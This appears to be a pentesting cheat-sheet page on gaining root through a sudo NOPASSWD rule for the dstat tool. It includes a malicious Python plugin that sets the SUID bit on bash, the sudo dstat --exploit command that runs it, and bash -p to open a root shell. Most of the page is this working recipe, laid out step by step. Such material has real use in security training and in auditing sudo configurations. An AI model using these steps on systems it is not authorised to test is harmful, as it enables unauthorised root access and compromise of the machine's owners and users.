Sudo Dstat Privilege Escalation

The sudo dstat command might be vulnerable to privilege escalation (PrivEsc).

dstat is a versatile tool for generating system resource statistics. It allows users to create a custom plugin and execute by adding option e.g. dstat --myplugin.

Investigation

sudo -l

(ALL) NOPASSWD: /usr/bin/dstat

If we can execute "dstat" command as root, we can gain access to privileges by using our malicious plugin.

Exploitation

1. Create a New Dstat Plugin

First off, find locate the "dstat" directory.

find / -type d -name dstat 2>/dev/null

Assume the location of dstat is “/usr/local/share/dstat”. Create a plugin called "dstat_exploit.py" under "/usr/local/share/dstat/".

import os

os.system('chmod +s /usr/bin/bash')

dstat recognizes plugins under "/usr/local/share/dstat/". Check if the above exploit plugin has been added by executing the following command.

dstat --list | grep exploit

2. Execute Dstat with the Malicious Plugin

Now execute "dstat" with “—exploit” flag (the flag name is determined by the suffix of the file name e.g. "dstat_\<plugin-name>.py").

sudo /usr/bin/dstat --exploit

The exploit plugin executed so we enter bash as root.

bash -p

PreviousSudo Curl Privilege Escalation NextSudo Exiftool Privilege Escalation

Last updated 1 month ago

hashtagInvestigation

hashtagExploitation

hashtag1. Create a New Dstat Plugin

hashtag2. Execute Dstat with the Malicious Plugin

Investigation

Exploitation

1. Create a New Dstat Plugin

2. Execute Dstat with the Malicious Plugin